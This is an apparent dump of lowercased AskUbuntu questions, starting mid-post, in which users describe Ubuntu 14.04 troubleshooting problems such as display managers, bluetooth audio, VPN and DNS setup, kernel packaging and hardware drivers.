otherwise errors out . but here 's the problem : if i log out and back in ( or reboot ) so that loading the module can take effect , the alternatives just jump back to option 3 . does anyone know what causes the alternative to be set back and how i can avoid that ? here is the log of what was upgraded . the only things that seem suspicious to me are ubuntu-drivers-common and xserver-xorg-video-intel : /var/log/apt/history.log upgrade : oxideqt-codecs : amd64 ( 1.0.5-0ubuntu0.14.04.1 , 1.1.2-0ubuntu0.14.04.1 ) , libreoffice-pdfimport : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , libreoffice-base-core : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , libsystemd-login0 : amd64 ( 204-5ubuntu20.4 , 204-5ubuntu20.5 ) , ure : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu 1 ) , systemd-services : amd64 ( 204-5ubuntu20.4 , 204-5ubuntu20.5 ) , libreoffice-writer : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , firefox-locale-en : amd64 ( 31.0+build1-0ubuntu0.14.04.1 , 32.0+build1-0ubuntu0.14.04.1 ) , libreoffice-impress : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , uno-libs3 : amd64 ( 4.2.4-0ubuntu2 , 4.2.6 .3-0ubuntu1 ) , libreoffice-avmedia-backend-gstreamer : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , librbd1 : amd64 ( 0.80.1-0ubuntu1.1 , 0.80.5-0ubuntu0.14.04.1 ) , libreoffice-draw : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , ubuntu-drivers-common : amd64 ( 0.2.91.5 , 0.2.91.6 ) , fonts-opensymbol : amd64 ( 102.6+libo4.2.4-0ubuntu 2 , 102.6+libo4.2.6.3-0ubuntu1 ) , firefox : amd64 ( 31.0+build1-0ubuntu0.14.04.1 , 32.0+build1-0ubuntu0.14.04.1 ) , libreoffice-core : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , libsystemd-daemon0 : amd64 ( 204-5ubuntu20.4 , 204-5ubuntu20.5 ) , libgudev-1.0-0 : amd64 ( 204-5ubuntu20.4 , 204-5ubuntu20.5 ) , libreoffice-gnome : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , libpam-systemd : amd64 ( 204-5ubuntu20.4 , 204-5ubuntu20.5 ) , librados2 : amd64 ( 0.80.1-0ubuntu1.1 , 0.80.5-0ubuntu0.14.04.1 ) , libreoffice-presentation-minimizer : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , shotwell-common : amd64 ( 0.18.0-0ubuntu4.1 , 0.18.0-0ubuntu4.2 ) , udev : amd64 ( 204-5 ubuntu20.4 , 204-5ubuntu20.5 ) , shotwell : amd64 ( 0.18.0-0ubuntu4.1 , 0.18.0-0ubuntu4.2 ) , libreoffice-style-human : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , gir1.2-gudev-1.0 : amd64 ( 204-5ubuntu20.4 , 204-5ubuntu20.5 ) , liboxideqtcore0 : amd64 ( 1.0.5-0ubuntu0.14.04.1 , 1.1.2-0ubuntu0.14.04.1 ) , libudev1 : amd64 ( 204-5ubuntu2 0.4 , 204-5ubuntu20.5 ) , libudev1 : i386 ( 204-5ubuntu20.4 , 204-5ubuntu20.5 ) , libreoffice-help-en-us : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , libreoffice-ogltrans : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , xserver-xorg-video-intel : amd64 ( 2.99.910-0ubuntu1 , 2.99.910-0ubuntu1.1 ) , python3-uno : amd64 ( 4.2.4-0ubuntu2 , 4 .2.6.3-0ubuntu1 ) , libreoffice-common : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , libsystemd-journal0 : amd64 ( 204-5ubuntu20.4 , 204-5ubuntu20.5 ) , libreoffice-gtk : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , liboxideqt-qmlplugin : amd64 ( 1.0.5-0ubuntu0.14.04.1 , 1.1.2-0ubuntu0.14.04.1 ) , libreoffice-math : amd64 ( 4.2.4-0ubu ntu2 , 4.2.6.3-0ubuntu1 ) , libreoffice-calc : amd64 ( 4.2.4-0ubuntu2 , 4.2.6.3-0ubuntu1 ) , rsyslog : amd64 ( 7.4.4-1ubuntu2 , 7.4.4-1ubuntu2.1 )
519932	error opening file using avconv conversion from mp4 to mov	i 'm trying to convert an .mp4 file to .mov file . the command is as below . avconv -i test1.mp4 kkk.mov .mov file is created but there is an error opening the file . below is the error . `` stream contains no data '' i tried using ffmpeg as well . but , that did n't work too . anyways , as ffmpeg seems to be not in maintenance anymore , i would prefer to go with avconv . please suggest a solution .
519935	understanding result of sudo fdisk -l	please help me decipher the following terminal response : sudo fdisk -l disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x8490d4ab device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 286719999 143256576 7 hpfs/ntfs/exfat /dev/sda3 959414272 976771071 8678400 82 linux swap / solaris /dev/sda4 286722046 959414271 336346113 5 extended /dev/sda5 655595520 959414271 151909376 83 linux /dev/sda6 410370048 655595519 122612736 83 linux /dev/sda7 286722048 410367999 61822976 83 linux how do i know the exact locations of sda5 , sda6 and sda7 . i want to do ls -l on them . guessing from their sizes : /sda5 is /misc which i created when i formatted the hdd 6 months back . /sda6 is /home . /sda7 i have no idea what this is ? but again , all these are my guesses , how do i verify ? when i had formatted my hdd.. i made a /misc partition . which i was never able to use . now i want to change its permissions . this is how i stumbled on this question .
519936	use volume up/down actions to go forward/backward in evince	i have a bluetooth headset hs3000 . when volume buttons of the headset are pressed to change the volume level , the changes can be seen in ubuntu sound settings . is it possible to bind another action to the actions triggered by the volume buttons of the headset ?
519937	how to get a consistent bluetooth audio playback ?	i am trying to use bluetooth audio speakers , as my integred laptop speakers are so awful ... the speaker is a bose soundlink mini and works just fine with my smartphone for example . when i try to use it with my laptop ( ubuntu 14.04 ) , it works ok , until i begin to work . then sound begins to shutter , with this kind of logs : sep 3 17:29:38 franck-thinkpad-t430s pulseaudio [ 3673 ] : [ bluetooth ] module-bluetooth-device.c : skipping 30147 us ( = 5316 bytes ) in audio stream sep 3 17:29:38 franck-thinkpad-t430s pulseaudio [ 3673 ] : [ bluetooth ] module-bluetooth-device.c : skipping 79152 us ( = 13960 bytes ) in audio stream sep 3 17:29:41 franck-thinkpad-t430s pulseaudio [ 3673 ] : [ bluetooth ] module-bluetooth-device.c : skipping 3467134 us ( = 611600 bytes ) in audio stream this happens as soon as i type on the keyboard ( be it in libreoffice or in a terminal , or whatever ) . the keyboard is not a bluetooth keyboard , in case you ask . when using internal speakers , i do n't suffer the same problem . so , is there a trick to give the full bluetooth audio stack higher priority and get a consistent audio plackback ? ( bluetoothd ? pulseaudio ? low level interupts ? ? ? ? ) update : my bluetooth controller is attached to ( internal ) usb . $ lsusb -v -s 001:004 bus 001 device 004 : id 0a5c:21e6 broadcom corp. bcm20702 bluetooth 4.0 [ thinkpad ]
519938	can i setup maas/juju and openstack completely offline ?	i am trying to setup openstack using the ubuntu cloud recommended way with maas + juju . i have some basic questions as i am very new to maas setup . can the maas environment ( including the minimal os images ) , juju bootstrap & charms setup be made completely offline without the need to fetch the packages from the internet every time we need to reinstall ( download & reuse next time ) . i have seen some way to do this for the bootstrap image & charms for juju but can we completely avoid going to the ubuntu repos everytime the setup is done ?
519940	question about something appearing in my terminal	after i moved from windows to ubuntu i liked to try out every new app i found so i decided to install betty ( a siri like alternative for ubuntu ) . i used the ppa given by webupd8 site and the last thing needed was to add the path to the main betty file using this command : echo `` alias betty=\ '' ~/betty/main.rb\ '' '' > > ~/.bashrc source ~/.bashrc for some reasons it did n't worked , i could n't install it properly , so i removed everything added by these ppas . but since then every time i open my terminal it shows these : bash : alias : source : not found bash : alias : /home/usrname/.bashrc : not found can i remove that ? it 's not a big deal , my terminal works fine , it just annoys me .
519941	using bcache for two used hdd	i have 2 hdd half full , one is 1.5t the other is 2 tb , with ntfs and mounted using ntfs-3g . i have a lot of random reads on those drives . i want to use my 80 gb empty ssd drive as a disk cache for both of my hdd drives ( but not my os drive ) . i reason i want to use bcache because afaik its the only flashcache that allows multiple drives to be cached with a single ssd . i have no experience with this so i would appreciate a step by step guide on how to do it , i could n't find any good documentation online .
519942	problem connecting to ssh server that is behind another ssh server in nautilus	so i have this school server that i am trying to connect to via nautilus . in terminal it 's all easy but i want to be able to open it also in nautilus . in terminal my way of doing it looks like this : ssh myuser @ my.server.com now that i am connected in there , i can do ssh myuser2.my.server2.com inside of that server to connect to server2 . i canoot connect to server 2 directly . it has to be done like i do it right now . so right now i can only get a connection to the first server in nautilus by typing ssh : //myuser @ my.server.com but how do i connect to the server2 from there ?
519944	installing vlc on xillinux ubuntu 12.04 that is running on microzed board ( arm cortex a9 )	i am doing research now . my problem is about installing vlc on xillinux ubuntu 12.04 that is running on a microzed board with an arm cortex a9 processor . my purpose is to install and run the vlc on microzed and it is displayed on laptop 's monitor via ethernet . actually i have set the ethernet connection so the ubuntu gui can be accessed and displayed on my laptop monitor . it works ! then i 'd like to install vlc . i tried the steps in help.ubuntu.com/community/compilevlc , but there is an error : e : unable to locate package checkinstall i tried to download and install checkinstall page from launchpad.net launchpad.net/ubuntu/+source/checkinstall/1.6.2-4ubuntu1 , file : checkinstall_1.6.2.orig.tar.gz then , i put it on /home . finally , i followed instructions on the downloaded install file , but it did n't work . i also followed this tutorial help.ubuntu.com/community/checkinstall , but it also did n't work . please give me some advice .
519945	any way to connect to my pptpd ( vpn ) while port 1723 is blocked ?	i 've set up a vpn/pptpd network on my vps with the intention to bypass the blocked ports at my work and in the train so i can watch youtube and stuff . now the problem is that when i try to connect to my vpn it throws me error 800 . so this basically means that port 1723 is blocked , which is pretty ironic . ( the remote connection was not made because the attempted vpn tunnels failed ) is there any way to achieve my intensions ? maybe another vpn server ?
519946	how to setup split-dns for vpn with network-manager	i want to create a split-dns config on a 14.04 desktop machine with both a local eth network and a vpn connection . ie i should send dns lookups for address ranges that are accessed via the vpn to the ( private ) dns servers that are configured for that particular vpn connection . other addresses which are served via the local net should use different ( public ) dns servers . https : //www.stgraber.org/2012/02/24/dns-in-ubuntu-12-04/ suggests this is easy to do now that we have a local dnsmasq resolver . quote : the big advantage is that if you connect to a vpn , instead of having all your dns traffic be routed through the vpn like in the past , youâll instead only send dns queries related to the subnet and domains announced by that vpn . this is especially interesting for high latency vpn links where everything would be slowed down in the past . but i can not figure out how to make this work ! with vpn inactive network-manager tells dnsmasq to use the local public dns servers as its upstream servers ( this is good ) . if i now activate a vpn connection network-manager tells dnsmasq to change the upstream dns servers to the private ones configured for the vpn connection . and now all my local traffic goes to vpn for its dns lookups ( this is bad ! ) . if i had a `` real '' dnsmasq setup i could tell it in dnsmasq.conf to route specific lookups to specific dns servers . but how does this work with the cut-down dnsmasq / network-manager setup provided with ubuntu desktop ? i guess that one option is just to install the full dnsmasq , but this then means that i need to maintain config details in 2 separate places which is the sort of thing that network-manager mostly overcomes . any suggestions ?
519947	ca n't get ubuntu 14.04 lts to install	i am trying to install ubuntu 14.04 lts on my sony vaio desktop . i put the dvd in the drive and get the icon on the bottom showing a keyboard and arrow , and then the screen goes blank and does not ever get beyond that point . i have tried to install ubuntu 10.10 on the computer , and that one works , but not the 14.04 i just downloaded . it is not a bad disk , because i have tested it on my laptop and it boots from the dvd just fine . my computer is a pcv-rz44g , not sure what specs are needed , but it is a pentium 4 , 2.8 ghz with a nvidia geforce fx5200 video card with 128 mb memory . have no idea why it does not boot , unless 14.04 lts is not compatible with that video card . computer used to run windows xp media center , but since xp is no longer supported and i had to replace the hd , i decided to install ubuntu instead . also tried booting with no hd connected , same result . i would like to run the latest version of ubuntu if possible , and if 14.04 is not compatible , can someone tell me what the latest version i should be able to run would be ? the only versions i have a dvd for are 14.04 and 10.10 . any assistance anyone can provide would be greatly appreciated . thanks .
519952	can not connect to wireless cisco x3500 router explicitly , on ubuntu 12.04	sorry to be the 100000th user to ask for help on this matter , but i have tried several solutions from various blogs and i still ca n't connect . my wifi card detects my router , but ca n't connect to it . on windows 8.1 , it connects with no trouble . i have made sure that i selected the right security mode , and i have entered the router 's mac address and ssid manually . i have tl-wdn4800 wireless adapter and a cisco x3500 router . i have tried changing my router 's security mode to wpa and also tried disabling security , and my computer still wo n't connect . my understanding of networks is primitive , which is why i am installing ubuntu over arch - so keep that in mind if you think you can solve my problem . edit : i have just tried to install ferdora 20 to see if it connects , but i have the exact same problem there too ... tried elementary os and arch before ubuntu : elemntary os has the same problem - probably because it 's based off ubuntu - and arch would only partially boot because of cpu incompatibilities . someone please help soon , i 'm running out of linux distros to try and i do n't want to have to resort to coding on windows ... ew . thank you : )
519953	'inoticoming ' folder ( directory ) creation is not detected and trigger action	how to put a trigger on a directory i want to automate move some ( regex ) file and above thread was useful , thanks to florian diesch . but , i found inoticoming not detect folder creation in monitoring path . for example , mkdir testfolder ( not detect ) mv testfolder othertestfolder ( detect ) is there anyway detect the folder creation and trigger ?
519954	unity not working on 14.04 after compiz configurator change	i am new to ubuntu and probably have a noob problem , but it seems to me to be rather complicated , any help will be appreciated . i 've tried to add opacity property to windows via compiz configurator and suddenly unity has crashed . it wo n't run after reboot either . i 've tried : compiz -- replace it stops on `` compiz ( core ) - info : starting plugin : session '' compiz -- replace cpp it wo n't load plugin cpp , as it ca n't find it . unity -- replace it does n't help : '' unknown job : unity-panel service ... no protocol specified ... '' tried to reinstall unity , and to reinstall ubuntu-desktop again no help , still empty screen after login . dconf reset -f /org/compiz/setsid unity unity -- reset-icons still no help ... what 's interesting here is that on the login stage i do see the top panel ( with language , wi-fi etc ... ) , but at the moment i log in , all of that disappears and there is empty screen . ubuntu is fresh installed , but i still do not want to reinstall it , as i have already done a lot to customize it .
519955	graphical interface not starting after suspend	while ubuntu was still working the update manager was telling me that not all packages could be installed and asked if i wished to do a partial update . i said no , but opened the synaptic package manager , selected mark all updates and hit apply . it updated without any complaint . then , as always i put my notebook in sleep mode , but after the resume it stuck at the back screen with the resuming process output . i then rebooted through the command line , i can see all the booting messages on the black screen , then i hear the drum sound `` ta-dam '' of the login manager , but the login manager itself does not show up . the screen is stuck at the black status prompt with the last message being * restoring resolver state ... [ ok ] i logged into the command line mode because u suspected that some packages may be broken . apt-get update had a gpg error , so i fixed it by a key import . then it had another checksum error , a repository change solved it . now apt-get works fine . i did apt-get upgrade and apt-get install -f , and autoclean , but nothing helped - after a reboot still the ta-dam sound and the prompt screen . any ideas how to fix without reinstalling the whole os ? : -/
519956	synaptics - multitouch tapping works , but not multitouch clicking	this is my first post on askubuntu , so welcome everyone ! : ) i 've just installed ubuntu 14.04 lts on my t440s and i find it very annoying that i can not seem to be able to modify my synaptics configuration . i want to have the following : two finger tap and click = right button three finger tap and click = middle button but the only thing which i have from default is : two finger tap = right button three finger tap = middle button trying to configure synclient does n't make a difference : parameter settings : leftedge = 1310 rightedge = 4826 topedge = 2220 bottomedge = 4636 fingerlow = 25 fingerhigh = 30 maxtaptime = 180 maxtapmove = 218 maxdoubletaptime = 180 singletaptimeout = 180 clicktime = 100 emulatemidbuttontime = 0 emulatetwofingerminz = 282 emulatetwofingerminw = 7 vertscrolldelta = 99 horizscrolldelta = 99 vertedgescroll = 1 horizedgescroll = 0 cornercoasting = 0 verttwofingerscroll = 1 horiztwofingerscroll = 0 minspeed = 1 maxspeed = 1.75 accelfactor = 0.0403307 touchpadoff = 1 lockeddrags = 0 lockeddragtimeout = 5000 rtcornerbutton = 2 rbcornerbutton = 3 ltcornerbutton = 0 lbcornerbutton = 0 tapbutton1 = 1 tapbutton2 = 3 tapbutton3 = 2 clickfinger1 = 1 clickfinger2 = 3 clickfinger3 = 2 circularscrolling = 0 circscrolldelta = 0.1 circscrolltrigger = 0 circularpad = 0 palmdetect = 0 palmminwidth = 10 palmminz = 200 coastingspeed = 20 coastingfriction = 50 pressuremotionminz = 30 pressuremotionmaxz = 160 pressuremotionminfactor = 1 pressuremotionmaxfactor = 1 resolutiondetect = 1 grabeventdevice = 1 tapanddraggesture = 1 arealeftedge = 0 arearightedge = 0 areatopedge = 0 areabottomedge = 0 horizhysteresis = 8 verthysteresis = 8 clickpad = 1 rightbuttonarealeft = 3068 rightbuttonarearight = 0 rightbuttonareatop = 4326 rightbuttonareabottom = 0 middlebuttonarealeft = 0 middlebuttonarearight = 0 middlebuttonareatop = 0 middlebuttonareabottom = 0 any help would be much appreciated : )
519957	google asks me to login every time i reboot	my online account for google loses the password every time i reboot my machine . i have a two tier log in to my google account as it is managed by my employer . i am aware that this has been dealt with as a bug in previous releases and would have commented on a previous thread ( google keep asking for permission to authorize my online account ) , but i have n't got 50 points , so am not allowed to . i am running ubuntu 14.04 . has anyone figured a workaround ? thanks
519960	kali linux installation alongside ubuntu and windows	i have windows 7 , windows 8.1 and ubuntu 14.04.1 installed on my hp 655 device , and i was looking to install kali linux on an extra partition . is it ideal to do that or should i just use persistence on live usb with kali linux ? ?
519964	why when setting up ubuntu 14.04.1 does it ask you for a username when it 's not used ?	i am a little confused about the username thing . i would expect the username to be the name i log in with . i think it 's safe to say most people would guess that . why is it done this way ? instead you log in with your full name , strange . also , why is it so hard to change , i mean i have to change directories just to change my name , and do it all from terminal .
519965	ca n't run my newly installed ubuntu 14.04	yesterday i installed ubuntu 14.04 via boot stick , i restarded my computer - everything worked perfectly fine . when i booted the system again later that day nothing worked after logging myself in . only the start up picture with ubuntu 14.04 written on the lower left side and the curser is shown . plus it 's saying , that it 's connected to the internet . i tried to log in with the guest account -same . i restarted a million times - nothings changes . i did n't do anything when i logged in the first time . do i have to reinstall ubuntu or is there a more simple solution ? can this be a hardware thing , since my laptop is about 7 years old and has its flaws ? p.s . : i do n't usually speak english and my computer skills do n't go beyond installing a new system and copying things into the terminal , which i 'm not able to open when i ca n't log in .
519967	launch eset libc library before samba daemon	trying to configure `` on-access scanner using preload libc library '' in eset file security . the manual states : ... to have the on-access scanner to monitor all file system access events immediately after starting the samba server . within the samba daemon initialization script ( /etc/init.d/smb ) , we would replace the statement daemon /usr/sbin/smbd $ smbdoptions with the following line : ld_preload= @ libdir @ /libesets_pac.so daemon /usr/sbin/smbd $ smbdoptions but i do not have a file /etc/init.d/smb , but there is /etc/init.d/smbd . can anyone tell me where to inscribe this line that would libc library was launched before the start of samba ?
519968	no grub shown to load ubuntu 13.04	hi i am new to ubuntu i have installed ubuntu 13.04 on my system using `` something else '' in 100gb space as it is not showing `` along side windows option '' where as my hd is 1tb . while installing the ubuntu it asked me give 1mb of space for bootloader something i clicked continue and after that it asked me to create swap space again i clicked continue and then the installation started and after installation it restarted and after the restart it directly loaded my windows and it is not showing grub to select ubuntu . i also tried boot repair using live usb by following the procedure given here https : //help.ubuntu.com/community/boot-repair and even the boot-repair is not getting installed . so please help me in resolving the issue . thanks in advance . processor : i3 4130 ram : 4gb hdd : 1tb seagate
519973	windows popping up wherever they want on dual monitor setup	i 'm with ubuntu 14.04 and 2 monitors . when i start programs it seems like they randomly choose on which monitor to appear and even worse , when i have program opened on monitor 1 sometimes it 's dialog boxes appear on monitor 2 . not to mention sometimes the dialog box appears behind the program window . quite confusing sometimes . how to put those wild programs in order ?
519975	ubuntu kylin 14.04 display problem	i 've just installed ubuntu kylin 14.04 and when i enter to desktop my screen is full of vertical colored lines .
519977	seahorse `` decrypt '' context menu does not appear in nautilus	i installed seahorse and seahorse-nautilus , so i can encrypt any file with right-click in nautilus , that works , wonderful . but there is no `` decrypt '' menu on any file ( not even .pgp files ) . is it a bug ? this 2009 thread says the problems can be solved by installing seahorse-plugins , but : $ sudo apt-get install seahorse-plugins reading package lists ... done building dependency tree reading state information ... done package seahorse-plugins is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : seahorse-nautilus : i386 seahorse-nautilus e : package 'seahorse-plugins ' has no installation candidate
519979	video scaling using sdlvideosink	how can i do video scaling using playbin2 and sdlvideosink . actually videoscale is not a property of playbin2 . so how can i do it . can you help me
519981	ubuntu format volume for windows	while trying to wipe a drive with dban i accidentally started the process on my laptop drive . the process ran for about 2 seconds before i stopped it but not before it caused some damage . i now have an unallocated file system so windows ca n't boot . i 've loaded ubuntu from a usb stick to try and get to the drive . i want format it to ntfs and i 'm given the option to `` do n't overwrite existing data ( quick ) '' will this mean it just sets it as ntfs and leaves the operating system and my files ( well , whatever is left ) and means i can boot into windows again ?
519982	what happens if deja dup backs up files which are locked or in use ?	since it backups the home dir , often it does it when i have files in used , for example file containers that are mounted as hdds . i find it hard to believe it can copy them correctly but it just does and does n't report any errors ?
519984	installing ubuntu with windows xp	i would like to install ubuntu on an old laptop and run in dual boot mode with windows xp . i can not even get started . i have created a partition on the hdd . i have tried loading ubuntu as .iso file onto an r/w dvd and expanded the iso into separate files but it wo n't boot even when i press f12 and select the disk drive as the source for booting . i have also tried the same thing with a usb stick . all that happens is that either the laptop boots into xp as normal or it just does nothing and has a black screen with a cursor flashing at the top left or sometimes 2 lines down . is it not possible to do what i want with windows xp ? i see several other questions like this with no answers .
519986	sound is not working after fresh reinstallation on ubuntu 14.04	i 'm trying to fix this issue using soundtroubleshooting guide i figured out ( w/ its help ) that the sound modules are not installed , so i issues the following command to install it : sudo apt-get install linux-restricted-modules-uname -rlinux-generic . but i get the following : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-restriced-modules-3.13.0-35-generic e : could n't find any package by regex 'linux-restriced-modules-3.13.0-35-generic' how to fix this ? ?
519990	i want to change my desktop enviroment	i 'm using ubuntu 14.04 and i like unity , but i 'm also curious so i would like to try out another de . few days ago i installed cinnamon via ppa but that was not my style . i read good things about gnome so i decided to give it a try . i went to official gnome site and i saw that i have to download the iso file , etc , but i wonder , is there an official ppa to install gnome 3.12 on ubuntu 14.04 ? by the way i found moka 's gnome shell theme and i installed that , it works , but i do n't know if that 's a full feature gnome shell or not . well i know it 's just a theme , but it give a whole new feeling .
519991	installing oracle 11g on ubuntu linux	how to download oracle 11g on ubuntu linux server using wget command ? i am totally new to linux so i am confused on may posts on net so asking for a proper clear one which could help . os installed on my machine is windows7 and i am using winscp and putty for accessing linux server .
519993	remote access times out after update	here is the situation : i have a macbook which i use for all of my development and an ubuntu server running a lamp stack for my website . i 've only had linux anything for a few days so please bear with me . this morning i was able to ssh to my ubuntu server on both the local network and through the public ip address of my router . i was able to ftp again locally as well as through the public ip of my router . i was able to access the mysql client both locally and through the public ip of the router . i was also able to write a php script , run it locally on my mamp stack on the macbook , and access the mysql database on the ubuntu server . this was accomplished through port forwarding and opening ports on the ufw as well as a few other configuration file tweaks where necessary . in short , all was well . now i can not ssh , ftp , or mysql client onto the server through the public ip . every attempt times out . the local network works fine for all of those things . this tells me that all of the services are running normally and listening on the correct ports . i have ensured that the ports are forwarded on the router , that the firewall ports are also open ( i even turned off the firewall just to be sure ) , and , using nmap , that ports 21 , 22 , and 3306 are all open . a link to my iptables as well as nmap and lsof here . sometime in the afternoon i updated and upgraded via ssh ( which was working at the time ) . i went to make a cup of tea and when i came back the terminal said something to the effect of `` write failure | pipe broken '' . it was after this that i noticed my remote ssh , ftp and mysql connections were timing out . three curious things : 1 . ) i can still access the mysql database remotely running scripts on my local mamp stack ( on the macbook ) which access the database through the public ip 2 . ) i can not ping the public ip . this seems to be central clue but i am just not certain what it means . 3 . ) the website which is hosted on the server is still up . port 80 still seems to be working ... any insight and/or critique of terminology is welcome .
519994	no internet connection after updates	i have installed some updates on my 14.04 after restarting the wired connection could be established but no internet access . ifconfig shows me an ip adress 192.168.0.199 . i tried to ping 192.168.0.1 but no received packets . here some outputs , sorry its not formated i had the write this on my phone : ifconfig : eth0 link encap : ethernet hwaddr 28 : d2:44:39 : f7:98 inet addr:192.168.0.199 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :2ad2:44ff : fe39 : f798/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:77 errors:0 dropped:0 overruns:0 frame:0 tx packets:787 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:8009 ( 8.0 kb ) tx bytes:86830 ( 86.8 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:631 errors:0 dropped:0 overruns:0 frame:0 tx packets:631 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:49459 ( 49.4 kb ) tx bytes:49459 ( 49.4 kb ) wlan0 link encap : ethernet hwaddr 0c:8b : fd:7c:0b : f5 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) route : kernel ip routing table destination gateway genmask flags metric ref use iface default 192.168.0.1 0.0.0.0 ug 0 0 0 eth0 192.168.0.0 * 255.255.255.0 u 1 0 0 eth0
519997	no wallpaper at startup	i 'm using lubuntu 14.04 . the wallpaper fails to show at start up on the screen , only a black screen with the desktop icons . if i click on the desktop 1 or desktop 2 icons , the wallpaper will show . what is wrong please ?
519998	build identical ubuntu kernel packages	i compile my own patched version of the upstream linux-kernel . until now i have always used make-kpkg , by running concurrency_level=9 fakeroot make-kpkg -- initrd -- append-to-version=-patched kernel_image kernel_headers kernel_debug . ( i have read about the kernel_debug target somewhere in the past , but it does not seem to be documented ) what i want are packages that behave and do exactly what the respective ubuntu packages do , since this does not seem to be the case . the above command creates the kernel headers package , but virtualbox dkms simply skips the build of the module for this kernel since it can not find the sources ( i checked , they are present in /usr/src ) . i need a debug package of my compiled kernel too , since kdump and other debugging tools require that and i would really like it to be a ubuntu package and it seems the created dbg package is rather small . apart from image , headers and debug ( via the ddebs repository ) ubuntu seems to offer linux-image-extra and linux-tools packages , which i could not find to be any target of `make-kpkg , are those automatically integrated ? so how could i build all those packages i need ? edit : i have found out the following : for the debug package , you need to have config_debug_info=y in your kernel configuration along with the kernel_debug target . for the dmks not finding kernel sources : it seems make-kpkg is not meant to create packages for others than yourself , since the package creates links to the build directory which is insane if you ask me and if you delete your build directory the headers package will be completely broken since link in /lib/modules/ < kernel-version > /build points to the build directory . is there a better method than make-kpkg because i don not need a tool that creates packages , that contain links that point to the build directory . why would anybody need a tool that automates stuff and you need to fix it afterwards ?
519999	what is the best ubuntu script for installing lamp	i have tried to install lamp on ubuntu 14.04lts cant get phpmyadmin to work and access mysql where is the clearest set of instructions to install lamp
520000	how ubuntu handles sd card remove from usb card reader	i am looking for some technical information . i have usb sd card reader connected to ubuntu machine . when i connect sd card to usb card reader , `` add '' event is triggered and i can see sd card is mounted . i am checking on udevadm monitor . when i remove sd card from usb card reader ( not removing usb card reader ) , i see only `` change '' event triggered from kernel . no `` remove '' event . but the mounted filesystem is unmounted properly . so i want to know , how ubuntu handles this ? with only change event it is able to detect sd card remove and unmount . is it handled in kernel or udev rule ? i am looking for details of kernel changes or udev rules ? as i am new to linux detailed information on this will help me understand better .
520001	is it safe to install kernel 3.6 on ubuntu 14.04	this question might sound stupid but pardon me as i 'm still new to linux..but i 've been having some problems with my railink rt3290 wireless driver and i 'm running kubuntu 14.04.i 've tried so many things that i saw on the web but they 're not working.i saw a bug concerning the rt3290 wireless chip here https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1049466 and they were all talking about upgrading to kernel 3.6 on ubuntu 12 to fix the issue ... i was initially running 3.13 generic then i 'm upgraded to 3.14 and now i 'm on 3.16 i did all this upgrades in an attempt to solve my wireless card problems.so my question is this : is it safe to install the 3.6 kernel on kubuntu 14.04 because that was what was proposed as the workaround for the problem but on the site https : //www.kernel.org/ they say the latest stable kernel is 3.16 which i 'm currently running on and they were always mentioning ubuntu 12 but i 'm on ubuntu 14 so is it safe ? or should i just stay on kernel 3.16 and keep on looking for solutions . why i 'm asking this is because i 've heard of kernel panic and i do n't wa n't to go through that and does it also mean that kernel 3.6 is unstable and could cause problems on some machines ... please i need someone to explain all this to me thanks
520002	change time format in log file	i have squid log file in follow format : 31/jul/2014:13:44:52 +0400.701 0 172.16.204.59 tcp_denied/407 5232 get http : //vec01.maps.yandex.net/tiles ? - none/- text/html but log analyzer need time in unix format . date command can convert to unix format : date -d `` 31 jul 2014 12:51:57 +0400 '' '+ % s' 1406796717 but i ca n't compose sed command for change format . please help me .
520003	acer extensa 5220 card reader does n't work on ubuntu 14.04	i have a problem with my card reader inside my acer extensa 5220 . it does n't work . i tried to put different cards in , but nothing happened ... please help .
